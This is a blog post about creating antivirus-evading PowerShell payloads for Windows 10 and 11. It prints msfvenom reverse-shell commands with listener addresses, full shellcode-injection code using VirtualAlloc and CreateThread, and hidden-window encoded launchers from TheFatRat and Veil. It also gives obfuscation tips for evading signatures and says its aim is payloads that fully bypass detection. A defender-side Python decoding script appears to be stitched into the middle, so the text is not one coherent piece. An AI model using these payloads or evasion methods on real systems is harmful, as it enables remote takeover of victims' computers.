Published in InfoSec Write-ups

LeoX

Apr 30 · 6 min read
UNDETECTABLE PAYLOAD FOR WINDOWS 10 AND 11



First, I should say that I am not a professional ethical hacker. I am a big
enthusiast whose hobby is hacking, and for a long time Microsoft Windows
security has been one of my favourite fields. I have always tried to stay one
step ahead of their security, and so far I have been quite successful. Why do I
point out that I am not a professional? Well, if one enthusiast can mess with
their security, imagine what a professional can do.

In this story I will talk about how attackers avoid detection of their viruses,
and how security has grown stronger and stronger over the years. I will also
show you that even with the big effort of antivirus software vendors, it is
still possible to create an undetectable payload. At the end I will give you a
link to my GitHub repository, where you can find undetectable payload code that
has been sitting there in the wild for more than 2 years. I was shocked when I
saw yesterday that it is still working.

Ok, let's start. How to avoid detection is the question of every attacker. These
days it is not easy to create a payload that avoids detection and does not
trigger an alarm. All antivirus software vendors, including Microsoft Defender,
are putting big effort into protecting users against threats, and each day they
do their job better and better. They are constantly updating their detection
systems and filling their databases with virus signatures. As soon as a new
virus shows up in the wild, it is just a matter of time until a patch is
available. On the other side, attackers are not sitting with crossed hands
either. Every day they look for new ways to avoid detection: they compile new
code and recompile existing code with the goal of avoiding detection and
compromising the system. Remember, there is no protection that will protect you
100%. This is a never-ending cat and mouse game between antivirus vendors and
attackers, a game that will never end and in which the attackers are always one
step in the lead.

In this post I will rely on the PowerShell scripting language, which is still
the best, most popular and most common language for creating payloads and
compromising the Windows operating system. PowerShell is a task-based
command-line shell and scripting language built on .NET, which helps system
administrators and power users rapidly automate tasks that manage operating
systems and processes. But I should mention, and we need to take into account,
that it is just a matter of time until the game between PowerShell payloads and
Microsoft Defender ends, since Microsoft is really putting big effort into
defending the system. Why, you will see further in the text.

In the following text I will show you how payloads were created in the past and
how they are created today, and I will also describe how detection evolved in
the meantime.

In the past it was enough to use a one-line command in e.g. msfvenom to
generate a payload. But those times are far behind us.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

or for a raw PowerShell payload:

msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 --format psh --smallest --platform win --arch x86

which gives you the following output:

$KrJpyZMB = @"
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
"@

$bvznJqWjba = Add-Type -memberDefinition $KrJpyZMB -Name "Win32" -namespace Win32Functions -passthru

[Byte[]] $zqiGAfUTkxCBu = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0x1,0xd3,0x8b,0x4,0x8b,0x1,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x0,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x7,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x3,0x53,0x53,0x68,0x90,0x1f,0x0,0x0,0xe8,0x9c,0x0,0x0,0x0,0x2f,0x31,0x73,0x41,0x4c,0x31,0x42,0x6d,0x36,0x30,0x36,0x59,0x31,0x46,0x6a,0x51,0x58,0x61,0x52,0x49,0x43,0x56,0x41,0x77,0x4e,0x62,0x77,0x6c,0x79,0x73,0x0,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x0,0x2,0x60,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0xa,0x5f,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x6,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x0,0x0,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xe1,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x0,0x10,0x0,0x0,0x68,0x0,0x0,0x40,0x0,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x0,0x20,0x0,0x0,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x7,0x1,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0x5f,0xe8,0x7d,0xff,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x2e,0x31,0x30,0x34,0x0

$VifvHnUwWmKQjn = $bvznJqWjba::VirtualAlloc(0,[Math]::Max($zqiGAfUTkxCBu.Length,0x1000),0x3000,0x40)

[System.Runtime.InteropServices.Marshal]::Copy($zqiGAfUTkxCBu,0,$VifvHnUwWmKQjn,$zqiGAfUTkxCBu.Length)

$bvznJqWjba::CreateThread(0,0,$VifvHnUwWmKQjn,0,0,0)

But very soon this basic way of creating payloads was patched, so attackers
were forced to find a new way. Soon they figured out that encoding the payload
would avoid detection. Because the payload was encoded, Windows Defender and
other antivirus vendors did not know what was hiding behind the encoded string,
so the system was easily compromised.

Here are a few examples of encoded payloads created with different payload
generators.

Payload created with msfvenom:

Note that in this case the base64 encoder was used, which is not installed in
Metasploit by default.

msfvenom –payload windows/meterpreter/reverse_http LHOST=192.168.1.104 LPORT=8080 –format psh –smallest | msfvenom –payload – –platform win –arch x86 –encoder base64 NOEXIT SYSWOW6c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand 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4

Payload created with TheFatRat:

powershell -w 1 -C “sv di -;sv qG ec;sv Foj ((gv di).value.toString()+(gv qG).value.toString());powershell (gv Foj).value.toString() ‘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'”

Payload created with Veil:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”nVPbbtswDH33VxCGgdqIbTiXFl2KAr0hW4EtK5piewjy4Chso1WWDIlO4nb599Gts61FNwzzy5El8pwjkgoEHMOJ700vlLosSmMp9O/RalT9XrpQyo9mUFZzJQU4yokBN8TncKnpiix8kZaqXJ0qZUTY7q1jqKQm2LRYt/gQHf23zrnFnPBmybDY6VQt7yqGX8rt6jftdqdR9088svVj4PjSY1wnn+ffUBBMakdYpGOkdGLEPZJrEcLpG2eni4VF50Z5IVU9Gw5ZAC0HrI29j+GtjGe8qUvk8AnxJYq3A6+sISOMakNvRBl5gUvPjdZsNNzrvuul3YPDtJt2s8FeDAP+IvgOpqJEV0odQVDy3aan1uaNteeyXWquqRYY+vOa0Oe0iAM3HMjc1yhQrjAMyldED3yeeUH9D3zTM0nscYWWK9H4NlyTfo854yzq7Ddq9TSbNYSbs5G3XkqFELJCoujvyRE8Nk46L63WcfDQ2Y+78Z+LPVL5nWO2sdEYwda7NZYV5XGXvUjWRRg0q06HFdhcIBt3O7pXjt4jnfFFXTjlkZqxkQ+5XiiMOCvpzrZeQJzLU5E0bYOkwGKO9gJvpZYkjYZAQDLOCwT/q9T9ng+J5j9X5gLhaWdUadFEOkjK3Dla2qpp0HFAw+GLF5bFQZ1+RH1Hyzjb9LMsYxhkkbdzfl1pkgWmTzNpygnalRTo0k+5dctcNS00Zd1UEDLu2/PbmIXBJt2VPYpi+CnC00e7rrePjxXjYBM3kL2cmAnllpKJQiwhmaAwegGHB4Ms24qcxPJx+wM=\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”) else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\”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\”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();”)

You can see three cases of encoded payloads, all of them slightly different.
But the point of all of them is the same: when they get executed, PowerShell
decodes the string and injects the payload into memory.

This trick worked for a while, until vendors patched the payloads generated
with the most popular payload generators. But attackers and developers kept
updating the payloads with obfuscation and by changing signatures. As soon as
you change the signature of a payload to one that is not already in an
antivirus database, it cannot be detected. Here is how this can be done.

For example, you can replace PowerShell parameters with their shortened forms:

NoExit = -NoE
EncodedCommand = -Enc
Command = -C

and so on…

Or you can obfuscate commands by splitting them into string fragments:

Invoke-Expression = "In"+"vok"+"e"+"-E"+"xpre"+"ssion"

Obfuscation can be done in many ways, and I will not dig deep into it because it
is a really large field; I will leave this topic for another story. But here is
a link where you can find a really cool script obfuscator, which does all the
heavy lifting for you: https://github.com/danielbohannon/Invoke-Obfuscation.

We have covered how PowerShell payloads developed over time and how encoding
and obfuscation tricks were used to avoid detection. But unfortunately today it
does not work so easily. The reason is that Microsoft has made a really big
step forward in security, and with the April 2018 update (build 1803) changed
the rules of the game. Windows got a big update, and since then it has been
getting better and better. I mean, now it is not enough just to avoid detection
when the payload file is downloaded to the victim's computer, because when the
payload is executed, Windows Defender decodes the payload and scans the code
again. If the code includes any suspicious command, e.g. VirtualAlloc,
CreateThread, etc., it sends the code to the cloud for additional analysis and
stops execution until it is sure the code is not harmful. Sometimes it takes a
day before you receive the notification that the executed file is malicious.
So the next step is to obfuscate the PowerShell payload before it is encoded,
or even to recompile the whole code.
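The defender-side counterpart of the "decode, then scan again" behaviour described above, as an added example that is not part of the original post: a Python triage helper that unpacks the layers used by the generators shown earlier (-EncodedCommand UTF-16LE base64 with its short aliases, and the Veil-style base64+Deflate wrapper), folds "In"+"vok"+"e" string splitting back together, and then flags the API names the article lists. The command lines it runs on are constructed samples, not real payloads, and the flag list is an assumption for illustration.

```python
import base64
import re
import zlib

# API names and cmdlets the article lists as triggers for Defender's re-scan.
SUSPICIOUS = ("VirtualAlloc", "CreateThread", "Invoke-Expression")
# powershell.exe accepts abbreviated parameter names (-Enc, -E, ...): match
# "-e<letters> <base64>" and confirm the letters really prefix EncodedCommand.
ENC_FLAG = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Veil-style wrapper: base64 text fed through IO.Compression.DeflateStream.
DEFLATE_B64 = re.compile(r"FromBase64String\(\W*([A-Za-z0-9+/=]+)\W*\)")
# "In"+"vok"+"e" string splitting: remove the quote-plus-quote seams.
CONCAT_SEAM = re.compile(r"""(["'])\s*\+\s*\1""")

def fold_concat(text):
    """Normalise split string literals so a signature matches the joined word."""
    return CONCAT_SEAM.sub("", text)

def decode_layers(cmdline):
    """Return every script layer hidden inside a PowerShell command line."""
    layers = []
    for flag, b64 in ENC_FLAG.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()):
            try:  # -EncodedCommand carries UTF-16LE script text
                layers.append(base64.b64decode(b64).decode("utf-16-le"))
            except (ValueError, UnicodeDecodeError):
                pass
    for b64 in DEFLATE_B64.findall(cmdline):
        try:  # DeflateStream is raw DEFLATE, hence wbits=-15
            layers.append(zlib.decompress(base64.b64decode(b64), -15).decode("ascii", "replace"))
        except (ValueError, zlib.error):
            pass
    return layers

def triage(cmdline):
    """Decode, normalise and flag: the 'scan again after decoding' step."""
    texts = [fold_concat(t) for t in [cmdline] + decode_layers(cmdline)]
    flags = sorted({s for t in texts for s in SUSPICIOUS if s.lower() in t.lower()})
    return {"layers": len(texts) - 1, "flags": flags}

# Constructed samples in the three shapes discussed above; INNER only names an API.
INNER = "$buf = $w::VirtualAlloc(0, 0x1000, 0x3000, 0x40)"
ENC_SAMPLE = "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(INNER.encode("utf-16-le")).decode()
_z = zlib.compressobj(wbits=-15)
DEFLATED = base64.b64encode(_z.compress(INNER.encode()) + _z.flush()).decode()
VEIL_SAMPLE = ('powershell.exe -NoP -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object '
               'IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream '
               f'(,$([Convert]::FromBase64String(\\"{DEFLATED}\\")))), [IO.Compression.CompressionMode]'
               '::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"')
OBF_SAMPLE = """powershell -C ("In"+"vok"+"e"+"-E"+"xpre"+"ssion") (gv Foj).value.toString()"""
```

Feed `triage()` the command line from a process-creation event (for example a 4688 record) to see which layers were unpacked and which listed names surfaced only after decoding.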

I hope I have given you tips and orientation on where and how to continue the
work to create a powerful payload that fully bypasses detection. You also need
to take into account that Microsoft Defender ATP is integrated with AMSI, which
is very effective against obfuscation. But remember, there is always a way.

At the end of this story I will post a link to my GitHub repository, where you
can find a payload that fully bypasses detection and works on Windows 10 and 11.
What is really interesting is that when I tried this code yesterday, after 2
years, it was still working, and I was really shocked. Why was I shocked? Well,
it is on GitHub, it is in the wild, and I do not know why it is not yet patched.
How have vendors not found it yet, especially Microsoft, who also owns GitHub
and who I assumed might have more insight into what is uploaded there? And one
more shock: this payload also works on Windows 11, which was not even released
when the code was made.



